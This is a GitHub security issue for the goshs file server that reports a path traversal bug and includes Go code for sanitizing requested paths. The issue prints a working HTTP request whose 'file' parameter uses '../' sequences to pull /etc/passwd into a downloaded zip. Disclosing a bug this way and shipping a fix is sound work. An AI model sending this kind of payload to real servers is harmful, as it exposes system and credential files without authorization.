patrickhener/goshs

[Security Issue] Path Traversal #2

patrickhener opened this issue · 1 comments

Oh no :( 🤦

GET /cf985bddf28fed5d5c53b069d6a6ebe601088ca6e20ec5a5a8438f8e1ffd9390/bulk-file?file=%252Fgo.mod&file=%252Fgo.sum&file=../../../../../../etc/passwd HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/
Upgrade-Insecure-Requests: 1

This will happily give you the passwd in the zip file. Once again, need to sanitize the path.
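One way to sanitize the `file` values of such a bulk-file request, written as an added example for this issue rather than goshs's own code: each value is decoded once more (the `%252F` in the request above suggests the handler sees a still-encoded `%2F`), joined onto the served root, and rejected if the cleaned result lies outside it. The root path `/srv/share` and the function names `SafeJoin`/`BulkFiles` are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path/filepath"
	"strings"
)

// ErrTraversal is returned when a requested path would escape the served root.
var ErrTraversal = errors.New("requested path escapes served directory")

// SafeJoin maps one user-supplied "file" query value onto the served root.
// The value is unescaped once more (the report's request double-encodes the
// leading slash as %252F), joined and cleaned, then checked to still lie under
// root. Symlinks inside root are not resolved here.
func SafeJoin(root, requested string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	unescaped, err := url.PathUnescape(requested)
	if err != nil {
		return "", err
	}
	full := filepath.Join(absRoot, filepath.FromSlash(unescaped))
	rel, err := filepath.Rel(absRoot, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return full, nil
}

// BulkFiles validates every "file" value of a bulk-file request and fails the
// whole request if any single value escapes root.
func BulkFiles(root string, values []string) ([]string, error) {
	out := make([]string, 0, len(values))
	for _, v := range values {
		p, err := SafeJoin(root, v)
		if err != nil {
			return nil, fmt.Errorf("file %q: %w", v, err)
		}
		out = append(out, p)
	}
	return out, nil
}
```

Because the whole request is rejected on the first bad value, the `../../../../../../etc/passwd` entry from the report prevents the zip from being built at all instead of silently dropping one file.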

Fixed